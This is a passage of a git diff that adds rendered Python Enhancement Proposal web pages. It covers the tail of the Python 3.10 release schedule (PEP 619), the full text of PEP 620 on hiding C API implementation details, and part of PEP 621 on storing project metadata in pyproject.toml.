  • 3.10.0 candidate 1: Tuesday, 2021-08-03
  • +
  • 3.10.0 candidate 2: Tuesday, 2021-09-07
  • +
  • 3.10.0 final: Monday, 2021-10-04
  • +
+
+
+

Bugfix releases

+

Actual:

+
    +
  • 3.10.1: Monday, 2021-12-06
  • +
  • 3.10.2: Friday, 2022-01-14
  • +
  • 3.10.3: Wednesday, 2022-03-16
  • +
  • 3.10.4: Thursday, 2022-03-24
  • +
  • 3.10.5: Monday, 2022-06-06
  • +
  • 3.10.6: Tuesday, 2022-08-02
  • +
  • 3.10.7: Tuesday, 2022-09-06
  • +
  • 3.10.8: Tuesday, 2022-10-11
  • +
  • 3.10.9: Tuesday, 2022-12-06
  • +
  • 3.10.10: Wednesday, 2023-02-08
  • +
  • 3.10.11: Wednesday, 2023-04-05 (final regular bugfix release with binary +installers)
  • +
+
+
+

Source-only security fix releases

+

Provided irregularly on an “as-needed” basis until October 2026.

+
    +
  • 3.10.12: Tuesday, 2023-06-06
  • +
  • 3.10.13: Thursday, 2023-08-24
  • +
  • 3.10.14: Tuesday, 2024-03-19
  • +
  • 3.10.15: Saturday, 2024-09-07
  • +
  • 3.10.16: Tuesday, 2024-12-03
  • +
+
+
+

3.10 Lifespan

+

3.10 will receive bugfix updates approximately every 2 months for +approximately 18 months. Some time after the release of 3.11.0 final, +the 11th and final 3.10 bugfix update will be released. After that, +it is expected that security updates (source only) will be released +until 5 years after the release of 3.10 final, so until approximately +October 2026.

+
+
+
+

Features for 3.10

+

Some of the notable features of Python 3.10 include:

+
    +
  • PEP 604, Allow writing union types as X | Y
  • +
  • PEP 612, Parameter Specification Variables
  • +
  • PEP 613, Explicit Type Aliases
  • +
  • PEP 618, Add Optional Length-Checking To zip
  • +
  • PEP 626, Precise line numbers for debugging and other tools
  • +
  • PEP 634, PEP 635, PEP 636, Structural Pattern Matching
  • +
  • PEP 644, Require OpenSSL 1.1.1 or newer
  • +
  • PEP 624, Remove Py_UNICODE encoder APIs
  • +
  • PEP 597, Add optional EncodingWarning
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0619.rst

+

Last modified: 2024-12-05 19:08:36 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0620/index.html b/pep-0620/index.html new file mode 100644 index 00000000000..f9f96dd892b --- /dev/null +++ b/pep-0620/index.html @@ -0,0 +1,703 @@ + + + + + + + + PEP 620 – Hide implementation details from the C API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 620 – Hide implementation details from the C API

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
19-Jun-2020
+
Python-Version:
+
3.12
+
+
+
+
Table of Contents +
+
+

Abstract

+

Introduce C API incompatible changes to hide implementation details.

+

Once most implementation details will be hidden, evolution of CPython +internals would be less limited by C API backward compatibility issues. +It will be way easier to add new features.

+

It becomes possible to experiment with more advanced optimizations in +CPython than just micro-optimizations, like tagged pointers.

+

Define a process to reduce the number of broken C extensions.

+

The implementation of this PEP is expected to be done carefully over +multiple Python versions. It already started in Python 3.7 and most +changes are already completed. The Process to reduce the number of +broken C extensions dictates the rhythm.

+
+
+

PEP withdrawn

+

This PEP was withdrawn by its author since the scope is too broad and the work is +distributed over multiple Python versions, which makes it difficult to make +a decision on the overall PEP. It was split into new PEPs with +narrower and better defined scopes, like PEP 670.

+
+
+

Motivation

+
+

The C API blocks CPython evolutions

+

Adding or removing members of C structures is causing multiple backward +compatibility issues.

+

Adding a new member breaks the stable ABI (PEP 384), especially for +types declared statically (e.g. static PyTypeObject MyType = +{...};). In Python 3.4, the PEP 442 “Safe object finalization” added +the tp_finalize member at the end of the PyTypeObject structure. +For ABI backward compatibility, a new Py_TPFLAGS_HAVE_FINALIZE type +flag was required to announce if the type structure contains the +tp_finalize member. The flag was removed in Python 3.8 (bpo-32388).

+

The PyTypeObject.tp_print member, deprecated since Python 3.0 +released in 2009, has been removed in the Python 3.8 development cycle. +But the change broke too many C extensions and had to be reverted before +3.8 final release. Finally, the member was removed again in Python 3.9.

+

C extensions rely on the ability to access structure members, +indirectly through the C API, or even directly. Modifying structures +like PyListObject cannot be even considered.

+

The PyTypeObject structure is the one which evolved the most, simply +because there was no other way to evolve CPython than modifying it.

+

A C extension can technically dereference a PyObject* pointer and +access PyObject members. This prevents experiments like tagged +pointers (storing small values as PyObject* which does not point to +a valid PyObject structure).

+

Replacing Python garbage collector with a tracing garbage collector +would also need to remove PyObject.ob_refcnt reference counter, +whereas currently Py_INCREF() and Py_DECREF() macros access +directly to PyObject.ob_refcnt.

+
+
+

Same CPython design since 1990: structures and reference counting

+

When the CPython project was created, it was written with one principle: +keep the implementation simple enough so it can be maintained by a +single developer. CPython complexity grew a lot and many +micro-optimizations have been implemented, but CPython core design has +not changed.

+

Members of PyObject and PyTupleObject structures have not +changed since the “Initial revision” commit (1990):

+
#define OB_HEAD \
+    unsigned int ob_refcnt; \
+    struct _typeobject *ob_type;
+
+typedef struct _object {
+    OB_HEAD
+} object;
+
+typedef struct {
+    OB_VARHEAD
+    object *ob_item[1];
+} tupleobject;
+
+
+

Only names changed: object was renamed to PyObject and +tupleobject was renamed to PyTupleObject.

+

CPython still tracks Python objects lifetime using reference counting +internally and for third party C extensions (through the Python C API).

+

All Python objects must be allocated on the heap and cannot be moved.

+
+
+

Why is PyPy more efficient than CPython?

+

The PyPy project is a Python implementation which is 4.2x faster than +CPython on average. PyPy developers chose to not fork CPython, but start +from scratch to have more freedom in terms of optimization choices.

+

PyPy does not use reference counting, but a tracing garbage collector +which moves objects. Objects can be allocated on the stack (or even not +at all), rather than always having to be allocated on the heap.

+

Objects layouts are designed with performance in mind. For example, a +list strategy stores integers directly as integers, rather than objects.

+

Moreover, PyPy also has a JIT compiler which emits fast code thanks to +the efficient PyPy design.

+
+
+

PyPy bottleneck: the Python C API

+

While PyPy is way more efficient than CPython to run pure Python code, +it is as efficient or slower than CPython to run C extensions.

+

Since the C API requires PyObject* and allows to access directly +structure members, PyPy has to associate a CPython object to PyPy +objects and maintain both consistent. Converting a PyPy object to a +CPython object is inefficient. Moreover, reference counting also has to +be implemented on top of PyPy tracing garbage collector.

+

These conversions are required because the Python C API is too close to +the CPython implementation: there is no high-level abstraction. +For example, structures members are part of the public C API and nothing +prevents a C extension to get or set directly +PyTupleObject.ob_item[0] (the first item of a tuple).

+

See Inside cpyext: Why emulating CPython C API is so Hard +(Sept 2018) by Antonio Cuni for more details.

+
+
+
+

Rationale

+
+

Hide implementation details

+

Hiding implementation details from the C API has multiple advantages:

+
    +
  • It becomes possible to experiment with more advanced optimizations in +CPython than just micro-optimizations. For example, tagged pointers, +and replace the garbage collector with a tracing garbage collector +which can move objects.
  • +
  • Adding new features in CPython becomes easier.
  • +
  • PyPy should be able to avoid conversions to CPython objects in more +cases: keep efficient PyPy objects.
  • +
  • It becomes easier to implement the C API for a new Python +implementation.
  • +
  • More C extensions will be compatible with Python implementations other +than CPython.
  • +
+
+
+

Relationship with the limited C API

+

The PEP 384 “Defining a Stable ABI” is implemented in Python 3.4. It introduces the +“limited C API”: a subset of the C API. When the limited C API is used, +it becomes possible to build a C extension only once and use it on +multiple Python versions: that’s the stable ABI.

+

The main limitation of the PEP 384 is that C extensions have to opt-in +for the limited C API. Only very few projects made this choice, +usually to ease distribution of binaries, especially on Windows.

+

This PEP moves the C API towards the limited C API.

+

Ideally, the C API will become the limited C API and all C extensions +will use the stable ABI, but this is out of this PEP scope.

+
+
+
+

Specification

+
+

Summary

+
    +
  • (Completed) Reorganize the C API header files: create Include/cpython/ and +Include/internal/ subdirectories.
  • +
  • (Completed) Move private functions exposing implementation details to the internal +C API.
  • +
  • (Completed) Convert macros to static inline functions.
  • +
  • (Completed) Add new functions Py_SET_TYPE(), Py_SET_REFCNT() and +Py_SET_SIZE(). The Py_TYPE(), Py_REFCNT() and +Py_SIZE() macros become functions which cannot be used as l-value.
  • +
  • (Completed) New C API functions must not return borrowed +references.
  • +
  • (In Progress) Provide pythoncapi_compat.h header file.
  • +
  • (In Progress) Make structures opaque, add getter and setter +functions.
  • +
  • (Not Started) Deprecate PySequence_Fast_ITEMS().
  • +
  • (Not Started) Convert PyTuple_GET_ITEM() and +PyList_GET_ITEM() macros to static inline functions.
  • +
+
+
+

Reorganize the C API header files

+

The first consumer of the C API was Python itself. There is no clear +separation between APIs which must not be used outside Python, and API +which are public on purpose.

+

Header files must be reorganized in 3 API:

+
    +
  • Include/ directory is the limited C API: no implementation +details, structures are opaque. C extensions using it get a stable +ABI.
  • +
  • Include/cpython/ directory is the CPython C API: less “portable” +API, depends more on the Python version, expose some implementation +details, few incompatible changes can happen.
  • +
  • Include/internal/ directory is the internal C API: implementation +details, incompatible changes are likely at each Python release.
  • +
+

The creation of the Include/cpython/ directory is fully backward +compatible. Include/cpython/ header files cannot be included +directly and are included automatically by Include/ header files +when the Py_LIMITED_API macro is not defined.

+

The internal C API is installed and can be used for specific usage like +debuggers and profilers which must access structures members without +executing code. C extensions using the internal C API are tightly +coupled to a Python version and must be recompiled at each Python +version.

+

STATUS: Completed (in Python 3.8)

+

The reorganization of header files started in Python 3.7 and was +completed in Python 3.8:

+
    +
  • bpo-35134: Add a new +Include/cpython/ subdirectory for the “CPython API” with +implementation details.
  • +
  • bpo-35081: Move internal +headers to Include/internal/
  • +
+
+
+

Move private functions to the internal C API

+

Private functions which expose implementation details must be moved to +the internal C API.

+

If a C extension relies on a CPython private function which exposes +CPython implementation details, other Python implementations have to +re-implement this private function to support this C extension.

+

STATUS: Completed (in Python 3.9)

+

Private functions moved to the internal C API in Python 3.8:

+
    +
  • _PyObject_GC_TRACK(), _PyObject_GC_UNTRACK()
  • +
+

Macros and functions excluded from the limited C API in Python 3.9:

+
    +
  • _PyObject_SIZE(), _PyObject_VAR_SIZE()
  • +
  • PyThreadState_DeleteCurrent()
  • +
  • PyFPE_START_PROTECT(), PyFPE_END_PROTECT()
  • +
  • _Py_NewReference(), _Py_ForgetReference()
  • +
  • _PyTraceMalloc_NewReference()
  • +
  • _Py_GetRefTotal()
  • +
+

Private functions moved to the internal C API in Python 3.9:

+
    +
  • GC functions like _Py_AS_GC(), _PyObject_GC_IS_TRACKED() +and _PyGCHead_NEXT()
  • +
  • _Py_AddToAllObjects() (not exported)
  • +
  • _PyDebug_PrintTotalRefs(), _Py_PrintReferences(), +_Py_PrintReferenceAddresses() (not exported)
  • +
+

Public “clear free list” functions moved to the internal C API and +renamed to private functions in Python 3.9:

+
    +
  • PyAsyncGen_ClearFreeLists()
  • +
  • PyContext_ClearFreeList()
  • +
  • PyDict_ClearFreeList()
  • +
  • PyFloat_ClearFreeList()
  • +
  • PyFrame_ClearFreeList()
  • +
  • PyList_ClearFreeList()
  • +
  • PyTuple_ClearFreeList()
  • +
  • Functions simply removed:
      +
    • PyMethod_ClearFreeList() and PyCFunction_ClearFreeList(): +bound method free list removed in Python 3.9.
    • +
    • PySet_ClearFreeList(): set free list removed in Python 3.4.
    • +
    • PyUnicode_ClearFreeList(): Unicode free list removed +in Python 3.3.
    • +
    +
  • +
+
+
+

Convert macros to static inline functions

+

Converting macros to static inline functions has multiple advantages:

+
    +
  • Functions have well defined parameter types and return type.
  • +
  • Functions can use variables with a well defined scope (the function).
  • +
  • Debugger can be put breakpoints on functions and profilers can display +the function name in the call stacks. In most cases, it works even +when a static inline function is inlined.
  • +
  • Functions don’t have macros pitfalls.
  • +
+

Converting macros to static inline functions should only impact very few +C extensions that use macros in unusual ways.

+

For backward compatibility, functions must continue to accept any type, +not only PyObject*, to avoid compiler warnings, since most macros +cast their parameters to PyObject*.

+

Python 3.6 requires C compilers to support static inline functions: the +PEP 7 requires a subset of C99.

+

STATUS: Completed (in Python 3.9)

+

Macros converted to static inline functions in Python 3.8:

+
    +
  • Py_INCREF(), Py_DECREF()
  • +
  • Py_XINCREF(), Py_XDECREF()
  • +
  • PyObject_INIT(), PyObject_INIT_VAR()
  • +
  • _PyObject_GC_TRACK(), _PyObject_GC_UNTRACK(), _Py_Dealloc()
  • +
+

Macros converted to regular functions in Python 3.9:

+
    +
  • Py_EnterRecursiveCall(), Py_LeaveRecursiveCall() +(added to the limited C API)
  • +
  • PyObject_INIT(), PyObject_INIT_VAR()
  • +
  • PyObject_GET_WEAKREFS_LISTPTR()
  • +
  • PyObject_CheckBuffer()
  • +
  • PyIndex_Check()
  • +
  • PyObject_IS_GC()
  • +
  • PyObject_NEW() (alias to PyObject_New()), +PyObject_NEW_VAR() (alias to PyObject_NewVar())
  • +
  • PyType_HasFeature() (always call PyType_GetFlags())
  • +
  • Py_TRASHCAN_BEGIN_CONDITION() and Py_TRASHCAN_END() macros +now call functions which hide implementation details, rather than +accessing directly members of the PyThreadState structure.
  • +
+
+
+

Make structures opaque

+

The following structures of the C API become opaque:

+
    +
  • PyInterpreterState
  • +
  • PyThreadState
  • +
  • PyGC_Head
  • +
  • PyTypeObject
  • +
  • PyObject and PyVarObject
  • +
  • PyTypeObject
  • +
  • All types which inherit from PyObject or PyVarObject
  • +
+

C extensions must use getter or setter functions to get or set structure +members. For example, tuple->ob_item[0] must be replaced with +PyTuple_GET_ITEM(tuple, 0).

+

To be able to move away from reference counting, PyObject must +become opaque. Currently, the reference counter PyObject.ob_refcnt +is exposed in the C API. All structures must become opaque, since they +“inherit” from PyObject. For, PyFloatObject inherits from +PyObject:

+
typedef struct {
+    PyObject ob_base;
+    double ob_fval;
+} PyFloatObject;
+
+
+

Making PyObject fully opaque requires converting Py_INCREF() and +Py_DECREF() macros to function calls. This change has an impact on +performance. It is likely to be one of the very last changes when making +structures opaque.

+

Making PyTypeObject structure opaque breaks C extensions declaring +types statically (e.g. static PyTypeObject MyType = {...};). C +extensions must use PyType_FromSpec() to allocate types on the heap +instead. Using heap types has other advantages like being compatible +with subinterpreters. Combined with PEP 489 “Multi-phase extension +module initialization”, it makes a C extension behavior closer to a +Python module, like allowing to create more than one module instance.

+

Making PyThreadState structure opaque requires adding getter and +setter functions for members used by C extensions.

+

STATUS: In Progress (started in Python 3.8)

+

The PyInterpreterState structure was made opaque in Python 3.8 +(bpo-35886) and the +PyGC_Head structure (bpo-40241) was made opaque in Python 3.9.

+

Issues tracking the work to prepare the C API to make following +structures opaque:

+
    +
  • PyObject: bpo-39573
  • +
  • PyTypeObject: bpo-40170
  • +
  • PyFrameObject: bpo-40421
      +
    • Python 3.9 adds PyFrame_GetCode() and PyFrame_GetBack() +getter functions, and moves PyFrame_GetLineNumber to the limited +C API.
    • +
    +
  • +
  • PyThreadState: bpo-39947
      +
    • Python 3.9 adds 3 getter functions: PyThreadState_GetFrame(), +PyThreadState_GetID(), PyThreadState_GetInterpreter().
    • +
    +
  • +
+
+
+

Disallow using Py_TYPE() as l-value

+

The Py_TYPE() function gets an object type, its PyObject.ob_type +member. It is implemented as a macro which can be used as an l-value to +set the type: Py_TYPE(obj) = new_type. This code relies on the +assumption that PyObject.ob_type can be modified directly. It +prevents making the PyObject structure opaque.

+

New setter functions Py_SET_TYPE(), Py_SET_REFCNT() and +Py_SET_SIZE() are added and must be used instead.

+

The Py_TYPE(), Py_REFCNT() and Py_SIZE() macros must be +converted to static inline functions which can not be used as l-value.

+

For example, the Py_TYPE() macro:

+
#define Py_TYPE(ob)             (((PyObject*)(ob))->ob_type)
+
+
+

becomes:

+
#define _PyObject_CAST_CONST(op) ((const PyObject*)(op))
+
+static inline PyTypeObject* _Py_TYPE(const PyObject *ob) {
+    return ob->ob_type;
+}
+
+#define Py_TYPE(ob) _Py_TYPE(_PyObject_CAST_CONST(ob))
+
+
+

STATUS: Completed (in Python 3.10)

+

New functions Py_SET_TYPE(), Py_SET_REFCNT() and +Py_SET_SIZE() were added to Python 3.9.

+

In Python 3.10, Py_TYPE(), Py_REFCNT() and Py_SIZE() can no +longer be used as l-value and the new setter functions must be used +instead.

+
+
+

New C API functions must not return borrowed references

+

When a function returns a borrowed reference, Python cannot track when +the caller stops using this reference.

+

For example, if the Python list type is specialized for small +integers, store directly “raw” numbers rather than Python objects, +PyList_GetItem() has to create a temporary Python object. The +problem is to decide when it is safe to delete the temporary object.

+

The general guidelines is to avoid returning borrowed references for new +C API functions.

+

No function returning borrowed references is scheduled for removal by +this PEP.

+

STATUS: Completed (in Python 3.9)

+

In Python 3.9, new C API functions returning Python objects only return +strong references:

+
    +
  • PyFrame_GetBack()
  • +
  • PyFrame_GetCode()
  • +
  • PyObject_CallNoArgs()
  • +
  • PyObject_CallOneArg()
  • +
  • PyThreadState_GetFrame()
  • +
+
+
+

Avoid functions returning PyObject**

+

The PySequence_Fast_ITEMS() function gives a direct access to an +array of PyObject* objects. The function is deprecated in favor of +PyTuple_GetItem() and PyList_GetItem().

+

PyTuple_GET_ITEM() can be abused to access directly the +PyTupleObject.ob_item member:

+
PyObject **items = &PyTuple_GET_ITEM(0);
+
+
+

The PyTuple_GET_ITEM() and PyList_GET_ITEM() macros are +converted to static inline functions to disallow that.

+

STATUS: Not Started

+
+
+

New pythoncapi_compat.h header file

+

Making structures opaque requires modifying C extensions to +use getter and setter functions. The practical issue is how to keep +support for old Python versions which don’t have these functions.

+

For example, in Python 3.10, it is no longer possible to use +Py_TYPE() as an l-value. The new Py_SET_TYPE() function must be +used instead:

+
#if PY_VERSION_HEX >= 0x030900A4
+    Py_SET_TYPE(&MyType, &PyType_Type);
+#else
+    Py_TYPE(&MyType) = &PyType_Type;
+#endif
+
+
+

This code may ring a bell to developers who ported their Python code +base from Python 2 to Python 3.

+

Python will distribute a new pythoncapi_compat.h header file which +provides new C API functions to old Python versions. Example:

+
#if PY_VERSION_HEX < 0x030900A4
+static inline void
+_Py_SET_TYPE(PyObject *ob, PyTypeObject *type)
+{
+    ob->ob_type = type;
+}
+#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type)
+#endif  // PY_VERSION_HEX < 0x030900A4
+
+
+

Using this header file, Py_SET_TYPE() can be used on old Python +versions as well.

+

Developers can copy this file in their project, or even to only +copy/paste the few functions needed by their C extension.

+

STATUS: In Progress (implemented but not distributed by CPython yet)

+

The pythoncapi_compat.h header file is currently developed at: +https://github.com/pythoncapi/pythoncapi_compat

+
+
+
+

Process to reduce the number of broken C extensions

+

Process to reduce the number of broken C extensions when introducing C +API incompatible changes listed in this PEP:

+
    +
  • Estimate how many popular C extensions are affected by the +incompatible change.
  • +
  • Coordinate with maintainers of broken C extensions to prepare their +code for the future incompatible change.
  • +
  • Introduce the incompatible changes in Python. The documentation must +explain how to port existing code. It is recommended to merge such +changes at the beginning of a development cycle to have more time for +tests.
  • +
  • Changes which are the most likely to break a large number of C +extensions should be announced on the capi-sig mailing list to notify +C extensions maintainers to prepare their project for the next Python.
  • +
  • If the change breaks too many projects, reverting the change should be +discussed, taking in account the number of broken packages, their +importance in the Python community, and the importance of the change.
  • +
+

The coordination usually means reporting issues to the projects, or even +proposing changes. It does not require waiting for a new release including +fixes for every broken project.

+

Since more and more C extensions are written using Cython, rather +directly using the C API, it is important to ensure that Cython is +prepared in advance for incompatible changes. It gives more time for C +extension maintainers to release a new version with code generated with +the updated Cython (for C extensions distributing the code generated by +Cython).

+

Future incompatible changes can be announced by deprecating a function +in the documentation and by annotating the function with +Py_DEPRECATED(). But making a structure opaque and preventing the +usage of a macro as l-value cannot be deprecated with +Py_DEPRECATED().

+

The important part is coordination and finding a balance between CPython +evolutions and backward compatibility. For example, breaking a random, +old, obscure and unmaintained C extension on PyPI is less severe than +breaking numpy.

+

If a change is reverted, we move back to the coordination step to better +prepare the change. Once more C extensions are ready, the incompatible +change can be reconsidered.

+
+
+

Version History

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0620.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0621/index.html b/pep-0621/index.html new file mode 100644 index 00000000000..3b249a0486a --- /dev/null +++ b/pep-0621/index.html @@ -0,0 +1,924 @@ + + + + + + + + PEP 621 – Storing project metadata in pyproject.toml | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 621 – Storing project metadata in pyproject.toml

+
+
Author:
+
Brett Cannon <brett at python.org>, +Dustin Ingram <di at python.org>, +Paul Ganssle <paul at ganssle.io>, +Pradyun Gedam <pradyunsg at gmail.com>, +Sébastien Eustace <sebastien at eustace.io>, +Thomas Kluyver <thomas at kluyver.me.uk>, +Tzu-ping Chung <uranusjr at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
22-Jun-2020
+
Post-History:
+
22-Jun-2020, +18-Oct-2020, +24-Oct-2020, +31-Oct-2020
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, pyproject.toml specification, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP specifies how to write a project’s core metadata in a +pyproject.toml file for packaging-related tools to consume.

+
+
+

Motivation

+

The key motivators of this PEP are:

+
    +
  • Encourage users to specify core metadata statically for speed, +ease of specification, unambiguity, and deterministic consumption by +build back-ends
  • +
  • Provide a tool-agnostic way of specifying metadata for ease of +learning and transitioning between build back-ends
  • +
  • Allow for more code sharing between build back-ends for the +“boring parts” of a project’s metadata
  • +
+

To speak specifically to the motivation for static metadata, that has +been an overall goal of the packaging ecosystem for some time. As +such, making it easy to specify metadata statically is important. This +also means that raising the cost of specifying data as dynamic is +acceptable as users should skew towards wanting to provide static +metadata.

+

Requiring the distinction between static and dynamic metadata also +helps with disambiguation for when metadata isn’t specified. When any +metadata may be dynamic, it means you never know if the absence of +metadata is on purpose or because it is to be provided later. By +requiring that dynamic metadata be specified, it disambiguates the +intent when metadata goes unspecified.

+

This PEP does not attempt to standardize all possible metadata +required by a build back-end, only the metadata covered by the +core metadata specification which are very common across projects +and would stand to benefit from being static and consistently +specified. This means build back-ends are still free and able to +innovate around patterns like how to specify the files to include in a +wheel. There is also an included escape hatch for users and build +back-ends to use when they choose to partially opt-out of this PEP +(compared to opting-out of this PEP entirely, which is also possible).

+

This PEP is also not trying to change the underlying core metadata +in any way. Such considerations should be done in a separate PEP which +may lead to changes or additions to what this PEP specifies.

+
+
+

Rationale

+

The design guidelines the authors of this PEP followed were:

+
    +
  • Define a representation of as much of the core metadata in +pyproject.toml as is reasonable
  • +
  • Define the metadata statically with an escape hatch for those who +want to define it dynamically later via a build back-end
  • +
  • Use familiar names where it makes sense, but be willing to use more +modern terminology
  • +
  • Try to be ergonomic within a TOML file instead of mirroring how +build back-ends specify metadata at a low-level when it makes sense
  • +
  • Learn from other build back-ends in the packaging ecosystem which +have used TOML for their metadata
  • +
  • Don’t try to standardize things which lack a pre-existing standard +at a lower-level
  • +
  • When metadata is specified using this PEP, it is considered +canonical
  • +
+
+
+

Specification

+

When specifying project metadata, tools MUST adhere and honour the +metadata as specified in this PEP. If metadata is improperly specified +then tools MUST raise an error to notify the user about their mistake.

+

Data specified using this PEP is considered canonical. Tools CANNOT +remove, add or change data that has been statically specified. Only +when a field is marked as dynamic may a tool provide a “new” value.

+
+

Details

+
+

Table name

+

Tools MUST specify fields defined by this PEP in a table named +[project]. No tools may add fields to this table which are not +defined by this PEP or subsequent PEPs. For tools wishing to store +their own settings in pyproject.toml, they may use the [tool] +table as defined in PEP 518. The lack of a [project] table +implicitly means the build back-end will dynamically provide all +fields.

+
+
+

name

+ +

The name of the project.

+

Tools MUST require users to statically define this field.

+

Tools SHOULD normalize this name, as specified by PEP 503, as soon +as it is read for internal consistency.

+
+
+

version

+ +

The version of the project as supported by PEP 440.

+

Users SHOULD prefer to specify already-normalized versions.

+
+
+

description

+ +

The summary description of the project.

+
+
+

readme

+ +

The full description of the project (i.e. the README).

+

The field accepts either a string or a table. If it is a string then +it is the relative path to a text file containing the full +description. Tools MUST assume the file’s encoding is UTF-8. If the +file path ends in a case-insensitive .md suffix, then tools MUST +assume the content-type is text/markdown. If the file path ends in +a case-insensitive .rst, then tools MUST assume the content-type +is text/x-rst. If a tool recognizes more extensions than this PEP, +they MAY infer the content-type for the user without specifying this +field as dynamic. For all unrecognized suffixes when a +content-type is not provided, tools MUST raise an error.

+

The readme field may also take a table. The file key has a +string value representing a relative path to a file containing the +full description. The text key has a string value which is the +full description. These keys are mutually-exclusive, thus tools MUST +raise an error if the metadata specifies both keys.

+

A table specified in the readme field also has a content-type +field which takes a string specifying the content-type of the full +description. A tool MUST raise an error if the metadata does not +specify this field in the table. If the metadata does not specify the +charset parameter, then it is assumed to be UTF-8. Tools MAY +support other encodings if they choose to. Tools MAY support +alternative content-types which they can transform to a content-type +as supported by the core metadata. Otherwise tools MUST raise an +error for unsupported content-types.

+
+
+

requires-python

+ +

The Python version requirements of the project.

+
+
+

license

+ +

The table may have one of two keys. The file key has a string +value that is a relative file path to the file which contains the +license for the project. Tools MUST assume the file’s encoding is +UTF-8. The text key has a string value which is the license of the +project whose meaning is that of the License field from the +core metadata. These keys are mutually exclusive, so a tool MUST +raise an error if the metadata specifies both keys.

+

A practical string value for the license key has been purposefully +left out to allow for a future PEP to specify support for SPDX +expressions (the same logic applies to any sort of “type” field +specifying what license the file or text represents).

+
+
+

authors/maintainers

+
    +
  • Format: Array of inline tables with string keys and values
  • +
  • Core metadata: Author/Author-email/Maintainer/Maintainer-email +(link)
  • +
  • Synonyms
      +
    • Flit: author/author-email/maintainer/maintainer-email +(link)
    • +
    • Poetry: authors/maintainers +(link)
    • +
    • Setuptools: author/author_email/maintainer/maintainer_email +(link)
    • +
    +
  • +
+

The people or organizations considered to be the “authors” of the +project. The exact meaning is open to interpretation — it may list the +original or primary authors, current maintainers, or owners of the +package.

+

The “maintainers” field is similar to “authors” in that its exact +meaning is open to interpretation.

+

These fields accept an array of tables with 2 keys: name and +email. Both values must be strings. The name value MUST be a +valid email name (i.e. whatever can be put as a name, before an email, +in RFC 822) and not contain commas. The email value MUST be a +valid email address. Both keys are optional.

+

Using the data to fill in core metadata is as follows:

+
    +
  1. If only name is provided, the value goes in +Author/Maintainer as appropriate.
  2. +
  3. If only email is provided, the value goes in +Author-email/Maintainer-email as appropriate.
  4. +
  5. If both email and name are provided, the value goes in +Author-email/Maintainer-email as appropriate, with the +format {name} <{email}> (with appropriate quoting, e.g. using +email.headerregistry.Address).
  6. +
  7. Multiple values should be separated by commas.
  8. +
+
+
+

keywords

+ +

The keywords for the project.

+
+
+

classifiers

+ +

Trove classifiers which apply to the project.

+
+
+

urls

+ +

A table of URLs where the key is the URL label and the value is the +URL itself.

+
+
+

Entry points

+ +

There are three tables related to entry points. The +[project.scripts] table corresponds to the console_scripts +group in the entry points specification. The key of the table is the name of the +entry point and the value is the object reference.

+

The [project.gui-scripts] table corresponds to the gui_scripts +group in the entry points specification. Its format is the same as +[project.scripts].

+

The [project.entry-points] table is a collection of tables. Each +sub-table’s name is an entry point group. The key and value semantics +are the same as [project.scripts]. Users MUST NOT create +nested sub-tables but instead keep the entry point groups to only one +level deep.

+

Build back-ends MUST raise an error if the metadata defines a +[project.entry-points.console_scripts] or +[project.entry-points.gui_scripts] table, as they would +be ambiguous in the face of [project.scripts] and +[project.gui-scripts], respectively.

+
+
+

dependencies/optional-dependencies

+
    +
  • Format: Array of PEP 508 strings (dependencies) and a table +with values of arrays of PEP 508 strings +(optional-dependencies)
  • +
  • Core metadata: Requires-Dist and Provides-Extra +(link, +link)
  • +
  • Synonyms
      +
    • Flit: requires for required dependencies, requires-extra +for optional dependencies +(link)
    • +
    • Poetry: [tool.poetry.dependencies] for dependencies (both +required and for development), +[tool.poetry.extras] for optional dependencies +(link)
    • +
    • Setuptools: install_requires for required dependencies, +extras_require for optional dependencies +(link)
    • +
    +
  • +
+

The (optional) dependencies of the project.

+

For dependencies, it is a key whose value is an array of strings. +Each string represents a dependency of the project and MUST be +formatted as a valid PEP 508 string. Each string maps directly to +a Requires-Dist entry in the core metadata.

+

For optional-dependencies, it is a table where each key specifies +an extra and whose value is an array of strings. The strings of the +arrays must be valid PEP 508 strings. The keys MUST be valid values +for the Provides-Extra core metadata. Each value in the array +thus becomes a corresponding Requires-Dist entry for the matching +Provides-Extra metadata.

+
+
+

dynamic

+ +

Specifies which fields listed by this PEP were intentionally +unspecified so another tool can/will provide such metadata +dynamically. This clearly delineates which metadata is purposefully +unspecified and expected to stay unspecified compared to being +provided via tooling later on.

+
    +
  • A build back-end MUST honour statically-specified metadata (which +means the metadata did not list the field in dynamic).
  • +
  • A build back-end MUST raise an error if the metadata specifies the +name in dynamic.
  • +
  • If the core metadata specification lists a field as “Required”, +then the metadata MUST specify the field statically or list it in +dynamic (build back-ends MUST raise an error otherwise, i.e. it +should not be possible for a required field to not be listed somehow +in the [project] table).
  • +
  • If the core metadata specification lists a field as “Optional”, +the metadata MAY list it in dynamic if the expectation is a +build back-end will provide the data for the field later.
  • +
  • Build back-ends MUST raise an error if the metadata specifies a +field statically as well as being listed in dynamic.
  • +
  • If the metadata does not list a field in dynamic, then a build +back-end CANNOT fill in the requisite metadata on behalf of the user +(i.e. dynamic is the only way to allow a tool to fill in +metadata and the user must opt into the filling in).
  • +
  • Build back-ends MUST raise an error if the metadata specifies a +field in dynamic but the build back-end was unable to provide the +data for it.
  • +
+
+
+
+

Example

+
[project]
